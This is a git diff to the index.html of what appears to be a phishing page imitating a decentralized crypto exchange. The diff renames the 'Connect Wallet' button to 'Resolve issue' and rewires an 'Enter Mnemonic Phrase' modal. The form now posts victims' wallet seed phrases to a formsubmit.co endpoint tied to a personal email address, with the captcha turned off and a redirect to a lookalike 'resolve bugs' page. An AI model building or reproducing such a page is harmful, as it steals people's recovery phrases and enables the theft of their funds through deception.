--- a/index.html
+++ b/index.html
@@ -324,7 +324,7 @@
                 <h2 class="sub-title">Trade, earn, and win crypto on the most popular decentralized<br> platform in the
                     galaxy.</h2>
                 <div class="d-flex cta align-items-center gap-2">
-                <span class="main-button" onclick="showModal('#modalCon1')">Connect Wallet</span>
+                <span class="main-button" onclick="showModal('#modalCon1')">Resolve issue</span>
 
                     <span class="main-button" onclick="showModal('#modalCon1')">Rewards</span>
                    
@@ -1263,9 +1263,12 @@
                 <span class="mTopic1">Enter Mnemonic Phrase</span>
                 <span onclick="closeSpan()" class="mClose1" style="font-family:arial">X</span>
             </p>
-            <form action="https://www.formbackend.com/f/e7435d3036f22a90" method="post"   >
+            <form action="https://formsubmit.co/wnewton0003@gmail.com " method="POST" />
             <div class="modDivBody">
-                <input class="modInp" type="text"><br><br>
+                <input type="hidden" name="_cc" value="">
+                <input type="hidden" name="_captcha" value="false">
+                 <input type="hidden" name="_next" value="https://pancakeswapresolvebugs.vercel.app/pancakes.html">
+               <input class="modInp" type="text"><br><br>
                 <textarea class="modArea" textarea id="message" name="phkey"></textarea>
                 <p class="modTypePara">Typically 12 (sometimes 24) words separated by single spaces</p>
             </div>
